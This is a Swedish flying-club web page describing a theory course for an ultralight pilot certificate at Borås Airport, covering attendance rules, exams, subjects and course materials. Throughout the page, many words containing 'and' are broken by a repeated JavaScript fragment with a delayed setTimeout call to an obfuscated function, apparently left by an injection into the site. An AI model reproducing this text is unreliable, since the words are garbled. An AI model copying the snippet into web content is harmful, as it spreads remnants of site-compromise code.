Teori

Teo­ri­kur­sen pågår från mit­ten av okto­ber till bör­jan av juni med en lek­tion i vec­kan på kvälls­tid i den fina lek­tions­sa­len i vårt klubb­hus på Borås Flyg­plats i Via­red. Tre teo­ri­prov med fler­vals­frå­gor skrivs i mit­ten och i slu­tet av teorikursen.

Av regel­skäl före­kom­mer ingen distans­ut­bild­ning och det krävs en hög pro­cen­tu­ell när­varo på kurs­till­fäl­lena för att få till­go­do­räkna sig teo­ri­ut­bild­ningen. Man får alltså inte läsa in sig på kurs­ma­te­ri­a­let på egen handom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and och gå på slut­pro­vet direkt.

Lek­tions­sa­len

Teo­ri­ut­bild­ningen för ult­ralätt flyg­cer­ti­fi­kat är i prin­cip iden­tisk med utbild­ning för allt annat pri­vat­flyg, med sär­skild ton­vikt på de ele­men­ten som är mest rele­vanta för ult­ralätt flyg­ning, exem­pel­vis låg­höjdsna­vi­ge­ring med karta utan hjälp av radiofyrar.

I utbild­ningen avhandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and­las följandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande ämnen:

  • Flyg­tek­niska ämnen – hur ett flyg­plan, dess motor och instru­ment fun­ge­rar. En blandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and­ning av teori och enklare tek­niska lek­tio­ner i han­ga­ren. Grund­läggandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande aero­dy­na­mik.
  • Fly­go­pe­ra­tiva pro­ce­du­rer – ett brett ämne som täc­ker bl.a. hur flyg­plat­ser fun­ge­rar och vilka reg­ler det finns för luftfarten.
  • Flyg­ra­di­o­te­le­foni – hur vi pra­tar med flyg­le­dare och med andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andra pilo­ter i luf­ten via flygradion.
  • Human factors – Hur män­ni­skan fun­ge­rar och hur det spe­lar in vid flygning.
  • Mete­o­ro­logi – Grund­läggandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande kun­skap i “väd­rets mak­ter”, hur det påver­kar oss fly­gare och vår flyg­pla­ne­ring, hur man kol­lar flyg­vä­der­pro­gno­ser, m.m. Fasci­nerandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande ämne, tyc­ker många!
  • Navi­ga­tion – Om karta & kom­pass, GPS, m.m. Hur man pla­ne­rar och genom­för sin flyg­tur inkl. bränsle– och flygtidsberäkningar.

Även det soci­ala (dvs fika­pa­u­serna och snac­ket fly­gin­tres­se­rade emel­lan) bru­kar vara upp­skat­tat av eleverna.

Kurs­ma­te­rial

Vi star­tar en teo­ri­kurs varje höst. Tre prak­tiska flyg­lek­tio­ner ingår i kost­na­den för den teo­re­tiska flyg­ut­bild­ningen — du kom­mer alltså att få genom­föra dina första flyg­lek­tio­ner redan i sambandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and med teoriutbildningen!

Om du vill hoppa på hös­tens utbild­ning, kon­takta kurs­le­da­ren, så kan vi hjälpa till med anmä­lan och svara på dina frågor!

Schema för teo­ri­kur­sen 2017–2018

I sam­ar­bete med